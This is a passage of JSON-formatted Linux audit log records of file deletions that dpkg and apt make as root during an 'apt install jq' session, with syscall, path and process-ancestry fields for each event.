"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0003",
"inode": 277010,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:815",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0004",
"inode": 277011,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:816",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0005",
"inode": 277162,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:817",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0006",
"inode": 277163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:818",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0007",
"inode": 277176,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:819",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0008",
"inode": 277182,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.513:820",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0009",
"inode": 277184,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.517:821",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0010",
"inode": 277189,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.517:822",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0011",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.517:823",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c820",
"0x5601697b8797",
"0x56016b42c836",
"0x5601697b8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0012",
"inode": 277194,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.517:824",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7652,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x56016b42c7f0",
"0x56016b4282a0",
"0x56016b5e8fd0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277200,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--configure",
"--pending"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.525:825",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c55146ce0",
"0x7f37c1cad377",
"0x64",
"0x1a"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/apt/",
"inode": 138201,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/apt/pkgcache.bin",
"inode": 133337,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.525:826",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.LaE9zZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.533:827",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.pZS6WZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.541:828",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.XxeMaZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.545:829",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.USu1OZ",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.549:830",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.CuWq5X",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.553:831",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.EDYIiX",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.557:832",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.IxaG6Z",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.565:833",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acbb60",
"0x7ffe41acbb60",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.8PQc20",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470478.569:834",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
